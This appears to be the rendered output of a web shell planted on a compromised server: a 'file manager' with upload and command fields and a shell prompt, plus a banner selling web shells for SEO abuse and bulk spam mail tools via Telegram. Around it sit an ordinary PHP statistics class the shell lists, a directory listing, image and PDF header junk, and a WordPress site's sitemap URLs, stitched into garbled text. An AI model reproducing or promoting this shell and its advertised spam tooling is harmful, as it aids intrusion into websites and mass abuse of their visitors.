xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
<?php

namespace Statistics;

class Container
{
    // random hash for separating title (yTitle, name, etc...) values
    const VALUES_SEPARATOR  = '46fba1c29318e214f782527121e97862';
    const TYPE_LINE         = 0;
    const TYPE_PIE          = 1;
    const TYPE_BAR          = 2;
    const TYPE_LAYERED_LINE = 3;
    const YAXIS_INTEGER     = 0;
    const YAXIS_DECIMAL     = 1;

    /**
     * @var string
     */
    private $name;

    /**
     * @var array
     */
    private $data;

    /**
     * @var string
     */
    private $title = '';

    /**
     * @var string
     */
    private $yTitle = '';

    /**
     * @var string
     */
    private $valueType = '';

    /**
     * @var integer
     */
    private $chartType;

    /**
     * @var integer
     */
    private $counterId;

    /**
     * @var integer
     */
    private $yAxisType = self::YAXIS_DECIMAL;

    public function __construct($data)
    {
        $this->data = $data;
    }

    /**
     * @param integer $type
     * @return \Statistics\Container
     */
    public function setChartType($type)
    {
        $this->chartType = $type;
        return $this;
    }

    /**
     * @param integer $type
     * @return \Statistics\Container
     */
    public function setYAxisType($type = self::YAXIS_DECIMAL)
    {
        $this->yAxisType = $type;
        return $this;
    }

    /**
     * @param integer $counterId
     * @return \Statistics\Container
     */
    public function setCounterId($counterId)
    {
        $this->counterId = $counterId;
        return $this;
    }

    /**
     * @param array $data
     * @return \Statistics\Container
     */
    public function setData($data)
    {
        $this->data = $data;
        return $this;
    }

    /**
     * @param string $title
     * @return \Statistics\Container
     */
    public function setTitle($title)
    {
        $this->title = $title;
        return $this;
    }

    /**
     * @param string $title
     * @return \Statistics\Container
     */
    public function setYTitle($title)
    {
        $this->yTitle = $title;
        return $this;
    }

    /**
     * @param string $title
     * @return \Statistics\Container
     */
    public function setName($name)
    {
        $this->name = $name;
        return $this;
    }

    /**
     * @param string $title
     * @return \Statistics\Container
     */
    public function setValueType($type)
    {
        $this->valueType = $type;
        return $this;
    }

    /**
     * @return integer
     */
    public function getChartType()
    {
        return $this->chartType;
    }

    /**
     * @return array:
     */
    public function getData()
    {
        return $this->data;
    }

    /**
     * @return string
     */
    public function getTitle()
    {
        return $this->title;
    }

    /**
     * @return string
     */
    public function getName()
    {
        return $this->name;
    }

    /**
     * @return string
     */
    public function getYTitle()
    {
        return $this->yTitle;
    }

    /**
     * @return integer
     */
    public function getYAxisType()
    {
        return $this->yAxisType;
    }

    /**
     * @return string
     */
    public function getValueType()
    {
        return $this->valueType;
    }

    /**
     * @return integer $counterId
     */
    public function getCounterId()
    {
        return $this->counterId;
    }
}

Filemanager

Name Type Size Permission Actions
Controller Folder 0755
View Folder 0755
Container.php File 3.34 KB 0644
Model.php File 45.27 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml